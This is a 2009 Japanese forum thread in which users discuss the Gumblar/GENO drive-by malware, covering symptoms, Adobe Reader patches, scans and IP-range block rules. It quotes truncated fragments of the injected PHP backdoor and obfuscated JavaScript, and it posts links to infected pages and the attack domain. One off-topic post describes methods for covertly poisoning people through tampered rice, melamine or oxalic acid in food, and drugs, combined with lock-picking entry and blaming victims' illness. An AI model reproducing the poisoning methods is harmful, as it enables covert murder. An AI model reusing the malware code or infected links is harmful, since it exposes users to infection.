ってどうやるか判る人居ます?是非ご教授してほしいです
332名無しさん@お腹いっぱい。:2009/05/13(水) 20:03:44
教示
333名無しさん@お腹いっぱい。:2009/05/13(水) 20:06:11
>>332
間違えました><

94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます?是非ご教示してほしいです
334名無しさん@お腹いっぱい。:2009/05/13(水) 20:10:14
まず服を脱ぎます
335名無しさん@お腹いっぱい。:2009/05/13(水) 20:12:43
>>303
不正なジャバスクリプトを仕込まれたページを閲覧する
ジャバスクリプト起動
アクロバットリーダー、もしくはフラッシュを起動
アクロバットのジャバスクリプト機能を起動
そこから侵入
336名無しさん@お腹いっぱい。:2009/05/13(水) 20:38:31
>>331
ルーターかPG2(ソフト)でブロックしろ。

PG2でのブロックの仕方はリネージュ資料室辺りでも漁ってくれ。説明は面倒だ。
Vistaの場合は、PG2(英文のβ)入れただけじゃ駄目で、ローダー経由で起動しないと
実際の動作しないことにも注意。
337名無しさん@お腹いっぱい。:2009/05/13(水) 20:57:22
うちは日本語化したPG2を常駐させてるなぁ
結構、役に立ってる
338名無しさん@お腹いっぱい。:2009/05/13(水) 20:58:07
>>336
よくわかんないけど・・・情報ありがとう!調べてみる
339名無しさん@お腹いっぱい。:2009/05/13(水) 21:21:58
もしこれ感染したの知らないままホームページ更新してたら
ソースにはなんて記述されてるの?
340名無しさん@お腹いっぱい。:2009/05/13(水) 21:34:49
>>339
参考

<?php
if(!function_exists('tmp_lkojfghx')){
if(isset($_POST['tmp_lkojfghx3']))
以下略

*.jsすべての後ろに、
<!-- document.write(unescape('0F%3COjAsJvcriOjApJvtJv
341名無しさん@お腹いっぱい。:2009/05/13(水) 21:48:32
今回のもラトビアとばされんのか?
342名無しさん@お腹いっぱい。:2009/05/13(水) 21:55:33
>>340
ありがとう

とりあえずトレンドマイクロ オンラインスキャン検出無し
sqlsodbc.chmハッシュ値確認正常
ホームページのソースに怪しい記述なし
pc再起動正常、cmdやregedit正常に起動

安心していいよな…
343名無しさん@お腹いっぱい。:2009/05/13(水) 22:28:58
GENOウイルスって感染するとDドライブとかにも影響出るんでしょうか?
再インストしてカスペルスキーのオンラインスキャンかけたらもう検出はされなかったんですが
申し訳ないのですがどなたか教えていただけないでしょうか
344名無しさん@お腹いっぱい。:2009/05/13(水) 22:50:47
>>343
データのバックアップができるぐらいだから
影響なかったはず
345名無しさん@お腹いっぱい。:2009/05/13(水) 22:53:49
>>344
レス本当にありがとうございます。安心しました
一回再インストールかけたらフォルダの合計は普通なのにHDのプロパティで調べたら
100G以上あったりしてすごく焦りました…
もう一度かけたら直ったのですがウイルス系にかかったのは初めてだったんで
色々と過敏になってしまってました
346名無しさん@お腹いっぱい。:2009/05/13(水) 23:02:47
>>345
ウィルスのほうをバックアップしてなかったら、大丈夫
347名無しさん@お腹いっぱい。:2009/05/13(水) 23:03:05
Macは感染しないよね?
348名無しさん@お腹いっぱい。:2009/05/13(水) 23:08:02
Windows7は感染しないよね?
349名無しさん@お腹いっぱい。:2009/05/13(水) 23:12:59
Vistaなら感染しない
350345:2009/05/13(水) 23:37:32
>>346
あれ…不安になってきました
Dドライブを見て隠し含めてフォルダが無くカスペルスキーで
オンラインチェックして問題なかった場合はまず大丈夫と見て良い…でしょうか?
351名無しさん@お腹いっぱい。:2009/05/13(水) 23:50:52
そろそろちゃんと報道されるかな?

628 シンフィアンドラ・ザンゼグラ(東日本) sage 2009/05/13(水) 23:48:57.86 ID:wuS3Hwtd(3)
小林製薬もGenoウィルスにやられてたのか。
シャレにならん事態だな。
http://www.kobayashi.co.jp/info/090512.html

クリーンインストールしない限り修復不能で、botnetに組み込まれてしまう
ような厄介な代物なのに、いつまで経ってもまともに報道されないのは
初期感染サイトが隠蔽したってのが大きいんだろうか。
352名無しさん@お腹いっぱい。:2009/05/14(木) 00:28:15
国内の正規サイト改ざん:攻撃サイトを変え再襲来
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884

 国内のWebサイトが次々に改ざんされ、閲覧者にウイルスを感染させようとする
悪質なJavaScriptが埋め込まれる問題が続いている。
 ラトビアに設置された攻撃サイトが4月末に閉鎖され、ひと安心と思ったのも束の
間、今度は「gumblar.cn」というドメインにサイトを移して、攻撃を再開
したようだ。中国のドメイン名だが、サイトはロシアでホストされている。

■BIG-server.com
 ゼロ(札幌市厚別区)が運営するレンタルサーバーのBIG-server.com(中略)
■ウェルネス
 医療情報の提供やマーケッティングを行っているウェルネス(東京都文京区)(中略)
■ホースマンクラブ
 インターネットポイントサービスを行っている、へそクリック(横浜市西区)は7日、
 ホームページ上に掲載していた広告主で競馬情報の提供を行っているホースマンクラ
 ブのサイトが改ざんされ、不正なスクリプトが埋め込まれていたと発表。広告の掲載
 を中止(中略)


 攻撃サイトが変わり、最初にロードされるJavaScriptファイルまでが頻繁に更新
されている。ウイルス対策ソフトの対応が間に合わないようで、更新直後の検出率
は極めて低いという状態だ。(中略)
353名無しさん@お腹いっぱい。:2009/05/14(木) 00:32:55
ここいらで一旦、一般人がやっておくべき対策をまとめようか
354名無しさん@お腹いっぱい。:2009/05/14(木) 00:33:26
ロシアにいってサーバーを破壊すればいいんでは?
355名無しさん@お腹いっぱい。:2009/05/14(木) 01:00:13
どんな症状がでるの?感染すると?
356名無しさん@お腹いっぱい。:2009/05/14(木) 01:01:45
ロシアンマフィアの構成員になれて逮捕される
357名無しさん@お腹いっぱい。:2009/05/14(木) 01:02:41
全身がもの凄くカユくなる
358名無しさん@お腹いっぱい。:2009/05/14(木) 01:04:44
肩こりがなおる
359名無しさん@お腹いっぱい。:2009/05/14(木) 01:08:19
タミフルで治るって舛添が言ってた。
360名無しさん@お腹いっぱい。:2009/05/14(木) 01:55:38
        ∧∧
       ヽ(・ω・)/   ズコー
      \(.\ ノ
    、ハ,,、  ̄
     ̄
361名無しさん@お腹いっぱい。:2009/05/14(木) 06:44:32
やっぱり有名どころが感染しないとダメなんだな 色んな意味で
362名無しさん@お腹いっぱい。:2009/05/14(木) 07:09:21
どうやってサイトを改ざんしているかってのに興味ない奴多すぎるし書いても無視されるし
いいよ無視しろよ難しいことからは目をそむけて生きろよ、おまえらは
理解できる奴だけ理解してればいいよ、もう

ftpはパスワードが暗号化されてない
snifferで盗撮すれば簡単に他人のパスワードを盗める
botnet、又は複数のノードを持ってたり複数のプロバイダと契約してたり
いろんな経路でsnifferできる環境にある奴、又は組織なら
いろんなサイトを改ざんできる
さらにいろんな人のメールを盗み見ることも出来る
どのサイトを見たのかという情報も簡単に手に入る
ネットが匿名なんていってる奴は情弱
全裸で外を歩いているようなものだよ
363名無しさん@お腹いっぱい。:2009/05/14(木) 07:19:34
avast先生が俺のPCを御助けくださった・・・
もう感謝するしかねえ
364名無しさん@お腹いっぱい。:2009/05/14(木) 07:21:15
AVAST今回は頑張った
365名無しさん@お腹いっぱい。:2009/05/14(木) 07:22:46
豚インフル並にたいした事なかったなw
366名無しさん@お腹いっぱい。:2009/05/14(木) 07:32:43
>>365
GENO社員乙
367名無しさん@お腹いっぱい。:2009/05/14(木) 08:48:46
>>351
大手企業だから詳細な説明してくれるといいんだが。
368名無しさん@お腹いっぱい。:2009/05/14(木) 09:14:28
Adobe Readerをアンインストールしたよ。
代わりはPDF-XCHANGE VIEWER。
369名無しさん@お腹いっぱい。:2009/05/14(木) 09:15:52
GENOウイルス
370名無しさん@お腹いっぱい。:2009/05/14(木) 10:17:55
unescapeが含まれてたら警告出すとか、そういうのできないの?大体unescape含んでるんでしょ?
371名無しさん@お腹いっぱい。:2009/05/14(木) 10:46:21
maido3.com/server/zousan/index.htmlに変なjsが組み込まれてるけど、
http://so.7walker.net/index.php?site=http%3A%2F%2Fwww.maido3.com%2Fserver%2Fzousan%2F&hua=
これって感染してる?
372名無しさん@お腹いっぱい。:2009/05/14(木) 10:53:03
直リンしちゃだめでしょ
373372:2009/05/14(木) 10:53:45
ごめんしてなかったか申し訳ない
374名無しさん@お腹いっぱい。:2009/05/14(木) 11:02:10
商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html


このページにアクセスすると、セキュリティソフト反応しますか?
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・

「JS:Redirector-H2」っていう名前なんですが、GENOウイルスの一種ですか?
375名無しさん@お腹いっぱい。:2009/05/14(木) 11:04:37
ウゼエな
376名無しさん@お腹いっぱい。:2009/05/14(木) 11:05:01
小林製薬もやられた?
http://www.kobayashi.co.jp/info/090512.html
377名無しさん@お腹いっぱい。:2009/05/14(木) 11:05:07
間違ってクリックしちゃうから工夫して書いて・・・
378名無しさん@お腹いっぱい。:2009/05/14(木) 11:07:20
379名無しさん@お腹いっぱい。:2009/05/14(木) 11:07:20
【小林製薬】一部Webサイトが第3者により改竄、ウイルススキャンのお願いとお詫び[05/12]
http://gimpo.2ch.net/test/read.cgi/owabiplus/1242212138/l50
380名無しさん@お腹いっぱい。:2009/05/14(木) 11:08:16
>>374
思いっきりgumblarの文字が!!
381名無しさん@お腹いっぱい。:2009/05/14(木) 11:10:19
>>380
gumblarって何ですか?
382名無しさん@お腹いっぱい。:2009/05/14(木) 11:12:10
Genoって難読化の方法もいくつかパターンがあるんだな。
383名無しさん@お腹いっぱい。:2009/05/14(木) 11:12:59
>>381
gumblarでこのスレを検索
384名無しさん@お腹いっぱい。:2009/05/14(木) 11:14:33
>>383
このスレの書き込みを見たんですが、要するに
「gumblar.cn」ってサイトに接続させるようなスクリプトが
このページに含まれていたってことなんでしょうか?

商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html
385名無しさん@お腹いっぱい。:2009/05/14(木) 11:16:35
>>384
その通り。gumblar.cnからウィルス本体を送り込まれる。
386名無しさん@お腹いっぱい。:2009/05/14(木) 11:18:48
>>385
なるほど・・・
それで、avastで検出されたウイルス名が「Redirector」だったわけか・・・
つまり、「再接続させる」って意味でしょうね

387名無しさん@お腹いっぱい。:2009/05/14(木) 11:22:12
>>384
なんで>>377>>378で言われてるのにまだそのままでリンク書いてるんだ?
わざとか?

ウイルスバスタースレでも悪用されてるぞ(本人か?)

http://pc11.2ch.net/test/read.cgi/sec/1242125567/355

355 名前:名無しさん@お腹いっぱい。 [] 投稿日:2009/05/14(木) 11:11:51
商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html


このページにアクセスすると、セキュリティソフト反応しますか?
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・
ウイルスバスターを使っている方はどうですか?
388名無しさん@お腹いっぱい。:2009/05/14(木) 11:23:11
↑ ごめんそのまま貼っちゃった リンク踏まないよう注意してください
389名無しさん@お腹いっぱい。:2009/05/14(木) 11:23:50
なにやってんだかwww
390名無しさん@お腹いっぱい。:2009/05/14(木) 11:24:21
>>388
ちょw
自分で言っておいてw
何をやっているw
391名無しさん@お腹いっぱい。:2009/05/14(木) 11:26:26
専ブラだとttpでもリンクになる場合が多いから危険すぎるな
392388:2009/05/14(木) 11:27:41
申し訳ない orz
393名無しさん@お腹いっぱい。:2009/05/14(木) 11:30:23
>>387-388
ワロタ
394名無しさん@お腹いっぱい。:2009/05/14(木) 11:32:25
ht tp://www.google.com/
こういう風に張ればいいんだよ
395名無しさん@お腹いっぱい。:2009/05/14(木) 11:35:18
http部分いじったって、GreaseMonkeyスクリプトや専ブラで直リンになるしどうだっていいよ
396名無しさん@お腹いっぱい。:2009/05/14(木) 11:39:04
>394
専ブラだとこれでも飛べちゃうんだよな
397名無しさん@お腹いっぱい。:2009/05/14(木) 11:42:52
>>396
そうなんだ。chaikaだと>>394はリンクされない。
398名無しさん@お腹いっぱい。:2009/05/14(木) 11:44:16
他のブラウザは知らんがIEならアドレスバーにコピペすれば
自動的にHTTPの文字が追加されるので
wwwから書けば良い
399名無しさん@お腹いっぱい。:2009/05/14(木) 11:45:18
途中の「test」を「てすと」に代えるとかしないと駄目だね
400名無しさん@お腹いっぱい。:2009/05/14(木) 11:47:15
hxxpでいいんじゃない?
401名無しさん@お腹いっぱい。:2009/05/14(木) 11:49:33
b2rだけど、こういうのってカーソルもってっただけでもヤバイ?
402名無しさん@お腹いっぱい。:2009/05/14(木) 11:51:10
www.example.com ←これをリンクにする専ブラもあるそうだ
ドットを●や■に変えるのをお勧め
403名無しさん@お腹いっぱい。:2009/05/14(木) 11:51:46
ttp://www.fourteenforty.jp/products/origma.htm
> 近年、Webページを閲覧する事により感染する「Drive-by-Download」マルウエアの問題が深刻化しています。
>Webブラウザやプラグイン、アプリケーションの脆弱性を利用してシステムにインストールされる事例が多発しており

GENOウイルスのことですね。よくわかりました。w
404名無しさん@お腹いっぱい。:2009/05/14(木) 11:54:39
384のはこのスレに貼られる前からあちこちのスレに貼られてるな
405名無しさん@お腹いっぱい。:2009/05/14(木) 11:55:29
↑気づいたのは今だよ
406名無しさん@お腹いっぱい。:2009/05/14(木) 11:57:05
vista使いは丸腰でブラブラしてても良いのかね
407名無しさん@お腹いっぱい。:2009/05/14(木) 12:34:23
>>406

よう俺
最近この話題知ったんだ

一応チェックはしておきたい
408名無しさん@お腹いっぱい。:2009/05/14(木) 12:39:02
逆にこれはホームページを持ってるとわかりやすいってこと?
htmlアップロードすりゃ感染してるかどうかわかるよな?
409名無しさん@お腹いっぱい。:2009/05/14(木) 12:42:05
ラトビア特急、ゆっくりと路線縮小中

2009/04/09(木)  7560 個
2009/04/17(金)  8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/30(木) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。

中々収束しないな orz
410名無しさん@お腹いっぱい。:2009/05/14(木) 12:44:00
違う。
clientとserverの違いを考えろ。
お前はclientだろうが
411名無しさん@お腹いっぱい。:2009/05/14(木) 12:46:01
>>386
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね

「俺スルドイこと言った」とか思ってる?
412名無しさん@お腹いっぱい。:2009/05/14(木) 12:47:04
>>409
インフルの感染者を見ているようだ
413名無しさん@お腹いっぱい。:2009/05/14(木) 13:00:30
【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖  閲覧者にはウイルス感染の恐れ [09/05/12]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242271601/
414名無しさん@お腹いっぱい。:2009/05/14(木) 13:34:38
>>409
これは延べ数?
415名無しさん@お腹いっぱい。:2009/05/14(木) 13:41:38
汚染米とラジコン
http://gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337-
http://gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20-
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
http://www.tk-telefilm.co.jp/gaslight.html
  夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
  精神的に追詰められる心理サスペンスの傑作!  
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
 ガスライティング----で検索 ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
416名無しさん@お腹いっぱい。:2009/05/14(木) 13:46:07
感染の確認方法は?
417名無しさん@お腹いっぱい。:2009/05/14(木) 13:49:33
>>414
延べ数なら減らないだろ
418名無しさん@お腹いっぱい。:2009/05/14(木) 13:50:32
gumblar.cnへの接続を遮断してもダメ?
419名無しさん@お腹いっぱい。:2009/05/14(木) 13:51:28
まだ感染してない人はバックアップ取っとけよ、新規インスコは設定がめんどい
もちろんほとんどの人は設定済みリカバリ用意してるだろうけど
420名無しさん@お腹いっぱい。:2009/05/14(木) 13:54:57
gumblar.cnにaguseで行ったらadblockのgumblar.cnカウントが5になってんだけど
これ大丈夫だよね?
もしabblockでgumblar.cnをブロックしてないと、abuseでgumblar.cn見ても駄目なんじゃ?
421名無しさん@お腹いっぱい。:2009/05/14(木) 13:57:51
〉〉419

感染の真偽はまだわからないが、
リカバリーディスク作ってなかった僕はどうすればいいでしょうか?
422名無しさん@お腹いっぱい。:2009/05/14(木) 13:59:46
>>421
クリーンインストール
423名無しさん@お腹いっぱい。:2009/05/14(木) 14:09:41
プリインストールじゃなければいいけど
424名無しさん@お腹いっぱい。:2009/05/14(木) 14:11:55
>>420
まじだな
aguseで怪しいサイト踏みまくったんだが・・・・
おれもgumblar.cnがカウントされてた
425名無しさん@お腹いっぱい。:2009/05/14(木) 14:17:54
〉〉423

プリインストールでした本当に(ry

詰んだか?OSはVISTAだけども、、、
後処置法何かある?
426名無しさん@お腹いっぱい。:2009/05/14(木) 14:18:45
すまん、Adobe Acrobatとreaderってどう違う?
プログラムの削除画面で、Acrobatがなくてreaderしかないんだが、readerだけアップデートしとけば良いってことなんだろうか?
427名無しさん@お腹いっぱい。:2009/05/14(木) 14:21:39
>>426
Acrobatは有償の製品版。PDF作成機能がある。
428名無しさん@お腹いっぱい。:2009/05/14(木) 14:23:44
>>420>>424
マジか
ヤバすぎるだろaguse
429名無しさん@お腹いっぱい。:2009/05/14(木) 14:23:46
誰か>>304にも答えてほしいです。
vistaだしjavaスクリプトも切ってるから一応このままアップデートしなくても大丈夫かな・・・?
430名無しさん@お腹いっぱい。:2009/05/14(木) 14:24:26
>>425
VistaでGenoに感染したのなら、初の例じゃないか?
JavascriptはVer.6以上のWindowsをはねてるし。
431名無しさん@お腹いっぱい。:2009/05/14(木) 14:24:49
read:読む[er]

readerが9.1.0ならreader開いてヘルプのとこから9.1.1にアップデートできる
あと設定からAdobereaderJavaScriptも切っとけ
432名無しさん@お腹いっぱい。:2009/05/14(木) 14:25:33
http://www.google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木)  7560 個
2009/04/17(金)  8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/28(火) 13612 個
2009/05/03(日) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。

http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日)  623 個
2009/05/06(水)  1108 個
2009/05/07(木)  1951 個
2009/05/08(金)  1437 個
2009/05/09(土)  648 個
2009/05/14(木)   24 個のドメインを感染させています。
433名無しさん@お腹いっぱい。:2009/05/14(木) 14:27:10
>>430
そっか。XPでもUAを偽装しておけばGenoを防げるなw
434名無しさん@お腹いっぱい。:2009/05/14(木) 14:27:27
>>420
怖いからVMwareでやってみた
俺もgumbarがカウントされてることを確認した・・・・
435名無しさん@お腹いっぱい。:2009/05/14(木) 14:28:06
>>427>>431
わかった。あり。
436名無しさん@お腹いっぱい。:2009/05/14(木) 14:28:17
>>430

いやまだカスペチェックしてないからワカラン

しかしIEがよく落ちたりするからさ
437名無しさん@お腹いっぱい。:2009/05/14(木) 14:31:44
感染の確認方法おしえろやクズ
438名無しさん@お腹いっぱい。:2009/05/14(木) 14:34:54
>>437
クズに教えを請うなんて恥ずべきことだぞ
439名無しさん@お腹いっぱい。:2009/05/14(木) 14:37:25
再起動して戻ってこれたら感染してない
440名無しさん@お腹いっぱい。:2009/05/14(木) 14:42:22
千葉女どこいっちゃったの
寂しいから出てこいよ
441名無しさん@お腹いっぱい。:2009/05/14(木) 14:44:37
???
442429:2009/05/14(木) 14:44:38
もしかしたら自分の質問は初心者すぎるからスルーされているのかな、と思うので
セキュリティ初心者質問スレに移動してよかですか?
マルチになる?
443名無しさん@お腹いっぱい。:2009/05/14(木) 14:50:32
該当バージョンのアップデートを>>292でDLできないか
444名無しさん@お腹いっぱい。:2009/05/14(木) 15:03:39
>>420
>adblockのgumblar.cnカウントが5になってんだけど

これってフィルタに「gumblar.cn」って入れてるってこと?
445名無しさん@お腹いっぱい。:2009/05/14(木) 15:04:21
>>443
すんません、できました。
騒いで申し訳ないです。
有難うございます。
446名無しさん@お腹いっぱい。:2009/05/14(木) 15:12:41
>>420
「gumblar.cn」をフィルタリングしてるなら
aguseで編集したアドレスにgumblar.cnという文字列が含まれるからだと思われ

gumblar.cnのIP「94.229.65.160 - 94.229.65.191」がブロックはアクセスしてないし
ブロックもカウントされなかったから、そういうこと
447名無しさん@お腹いっぱい。:2009/05/14(木) 15:13:50
>>444
>>446
安心した ありがとう
448445:2009/05/14(木) 15:13:52
すみません、もうちょっとだけ質問。
>>297はあまり気にしなくてもOK?
確かにプロパティみると9.1のままだけど。
449名無しさん@お腹いっぱい。:2009/05/14(木) 15:15:39
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
450名無しさん@お腹いっぱい。:2009/05/14(木) 15:16:14
>>449
えっ
451名無しさん@お腹いっぱい。:2009/05/14(木) 15:18:22
>>446
何だaguseのアドレスに反応しただけか!
あー安心したありがとう
452名無しさん@お腹いっぱい。:2009/05/14(木) 15:19:14
>>448
Adobe Reader 9.1.1 Update - Multiple Languagesはやった?
453名無しさん@お腹いっぱい。:2009/05/14(木) 15:19:20
>>450
えっ
454名無しさん@お腹いっぱい。:2009/05/14(木) 15:20:36
>>447
安心したついでに質問だけどいいかな
adblockのフィルタリングはこんな感じでいいのかな

*/94.229.[64-65].[0-255]/*
*/94.247.[2-3].[0-255]/*
455名無しさん@お腹いっぱい。:2009/05/14(木) 15:31:11
>>413
GENOだね
456名無しさん@お腹いっぱい。:2009/05/14(木) 15:31:50
なにそれこわい
457名無しさん@お腹いっぱい。:2009/05/14(木) 15:32:28
>>454
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

ここの下のほうの焼却炉ってところにたくさん禁止したほうがいいアドレスあるから使ってみたらどうだい?

だけどabblockよりルーターとかPCのFWに設定しておいたほうよさそう
何か俺が勘違いしていたらごめんね
458名無しさん@お腹いっぱい。:2009/05/14(木) 15:32:33
>>454
ttp://web-g.org/post/95186717
ここ見て*/94.247.[2-3].[0-255]/*は入れたんだけど
*/94.229.[64-65].[0-255]/*も入れた方がいいの?

自分も知りたいから、詳しい人お願いしますm(_ _)m
459名無しさん@お腹いっぱい。:2009/05/14(木) 15:32:33
JavaScriptの正規表現だからそれでOK
/*とか無くてもいい
460名無しさん@お腹いっぱい。:2009/05/14(木) 15:32:45
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
461名無しさん@お腹いっぱい。:2009/05/14(木) 15:32:50
aguseの件はマジびびった。
ミイラ取りが。。になったかとおもたよ
462名無しさん@お腹いっぱい。:2009/05/14(木) 15:39:02
>>454
これってoperaの場合どうやればいいの?
463名無しさん@お腹いっぱい。:2009/05/14(木) 15:41:25
adblockにIPアドレスベースのアクセスフィルタ機能はないでしょ
464名無しさん@お腹いっぱい。:2009/05/14(木) 15:42:53
425だが、

OSvistaでGENO大丈夫かと思うが心配だから
カスペ使おうと思ったがセキュリティソフトがマカフィで機能の一時停止ができない、、

他にできる確認方法ある?
WINDOWSのsqlsodbc.chmのチェックくらい?
探してもないんだが、、
465名無しさん@お腹いっぱい。:2009/05/14(木) 15:44:56
>>459
>>463

どっちが正しいの?
466名無しさん@お腹いっぱい。:2009/05/14(木) 15:48:24
踏んでみれば分かる
467名無しさん@お腹いっぱい。:2009/05/14(木) 15:49:49
>>466
えええええええええええええええええ
468名無しさん@お腹いっぱい。:2009/05/14(木) 15:49:58
カスペのオンラインスキャンの事を言ってるなら
ニフティのが同一らしいのでそっち使うといい
469名無しさん@お腹いっぱい。:2009/05/14(木) 15:53:01
>>448
ヘルプ>アクロバットリーダー9について の所で
バージョン9.11になっていなければパッチ適用されてない
470名無しさん@お腹いっぱい。:2009/05/14(木) 15:56:08
>>413
>小林製薬によれば、ユーザーが感染した恐れがあるのはダウンローダー型のトロイの木馬。主な動作としては、
>改ざんされたページにアクセスした場合、別のページからウイルスやスパイウェアをダウンロードするという。
>また、感染した場合には、「sqlsodbc.chm(C:\WINDOWS\system32\sqlsodbc.chm)が改変されるほか、
>コマンドプロンプトとレジストリエディタが起動不能になることが確認されている

ああ、間違いないGENOだ。
471名無しさん@お腹いっぱい。:2009/05/14(木) 15:56:50
>>436
カスペのサポセンに聞いたらチェックする時に設定を推奨レベルではなく高にして
何度かやってみてくれと言われた。それで感染の有無が分かるはずだってさ
472名無しさん@お腹いっぱい。:2009/05/14(木) 15:59:04
>>471
オンラインスキャンでも同じ?

てかわざわざサンクス
473名無しさん@お腹いっぱい。:2009/05/14(木) 15:59:44
>>464
ニフティのがカスペエンジンだったはず。
そっち使ってみては?
474名無しさん@お腹いっぱい。:2009/05/14(木) 16:03:10
>>473
サンクス
475名無しさん@お腹いっぱい。:2009/05/14(木) 16:06:08
>>466
俺xpだから、だれかadblock入れてる人>>454のフィルタ入れて>>384踏んでみてよ
お願いします
476名無しさん@お腹いっぱい。:2009/05/14(木) 16:07:48
>>413
小林製薬はこのウイルスに面白いネーミングをつけてくれるはず
477>>448:2009/05/14(木) 16:07:49
>>452
はい。>>292さんの所からやりました。
更新日時も今日の15時ぐらいになってます。
でも9.1(9.10のことですよね)のままです。
478名無しさん@お腹いっぱい。:2009/05/14(木) 16:11:15
>>468
>>452
9.1.1になってました!
ほんとーーーに有難うございます!
479名無しさん@お腹いっぱい。:2009/05/14(木) 16:12:34
>>469
スマソ間違えた。
本当に有難う!
480名無しさん@お腹いっぱい。:2009/05/14(木) 16:14:40
どんなソフトも大体そのへんにバージョン表示されるからw
481名無しさん@お腹いっぱい。:2009/05/14(木) 16:16:40
>>477
Product Adobe Reader
Version 9.1.1
Platform Windows
File Name AdbeRdrUpd911_all_incr.msp
File Size 1168 KB

これだぞ ttp://www.adobe.com/support/downloads/detail.jsp?ftpID=4452
482名無しさん@お腹いっぱい。:2009/05/14(木) 16:18:16
感染してた!
sqlsodbc.chm見事に改変されてるううう

クリーンインストールしてくる…
483名無しさん@お腹いっぱい。:2009/05/14(木) 16:27:07
>>482
いってら〜
484名無しさん@お腹いっぱい。:2009/05/14(木) 16:30:57
WinXPつかっててGDATAがアクセス拒否した。

ウェブサイトがブロックされました。
G DATA InternetSecurity 2009 がこのウェブサイトへのアクセスを拒否しました。
このサイトは感染しています。感染コード: JS:Redirector-H2 [Trj] (エンジン B)

保存してソース見たかったけどそれも出来なかった(拒否される)からエミュのWindows98でアクセスしないように保存して、ソース見た。

ttp://ghard.run.buttobi.net/1.jpg

…これ? エミュでもアクセスして感染するとハードディスクファイルを戻すのが面倒だからね、、、
Javascriptはいつも切ってるけどこれなら感染しないのかな。
485名無しさん@お腹いっぱい。:2009/05/14(木) 16:35:07
めっさ伸びとる
486名無しさん@お腹いっぱい。:2009/05/14(木) 16:37:25
>>470
ファイル実行regeditで
起動すればセーフって事?
487名無しさん@お腹いっぱい。:2009/05/14(木) 16:38:59
ガチでパニックが起きそうだな
488名無しさん@お腹いっぱい。:2009/05/14(木) 16:39:34
489名無しさん@お腹いっぱい。:2009/05/14(木) 16:41:52
インフルよりアレかもね。
490名無しさん@お腹いっぱい。:2009/05/14(木) 16:42:26
491名無しさん@お腹いっぱい。:2009/05/14(木) 16:44:22
あっちはいまのところ他人事だけど、こっちは目の前の火事だからな
492名無しさん@お腹いっぱい。:2009/05/14(木) 16:46:15
ワクチンないもんね。
フルインスコでなおるつっても邪魔くさいし。
493名無しさん@お腹いっぱい。:2009/05/14(木) 16:47:55
とにかくここに書いてあるIPを範囲焼き

ttp://www3.atword.jp/gnome/2000/01/13/block-list/
494名無しさん@お腹いっぱい。:2009/05/14(木) 16:52:05
薬事日報→小林製薬という流れか?
495名無しさん@お腹いっぱい。:2009/05/14(木) 17:00:09
笑い男事件
496名無しさん@お腹いっぱい。:2009/05/14(木) 17:00:31
>>480
そうなんですね。
全然知らなかった。
一つ賢くなったよ、有難う。
>>481
はい。
それやりました。
URLが紫になってます。


「URLが紫になってます。」だって。
初心者すぎて自分で泣けてくる。
497名無しさん@お腹いっぱい。:2009/05/14(木) 17:27:43
>>374-
乙です

一応、電凸して対応する様伝えました
498名無しさん@お腹いっぱい。:2009/05/14(木) 17:40:37
>>497
電凸した反応はどうだった?
499名無しさん@お腹いっぱい。:2009/05/14(木) 17:42:41
>>482
感染したのはビスタの人でつか?
500名無しさん@お腹いっぱい。:2009/05/14(木) 17:45:09
早く普通に駆除できるようにならんのかな
501名無しさん@お腹いっぱい。:2009/05/14(木) 17:54:24
>>499
ビスタにsqlsodbc.chmはないから違うと思う
502名無しさん@お腹いっぱい。:2009/05/14(木) 17:57:59
>>498
横柄の極み

同じ事を何度も言わせるわ、待たせるわ
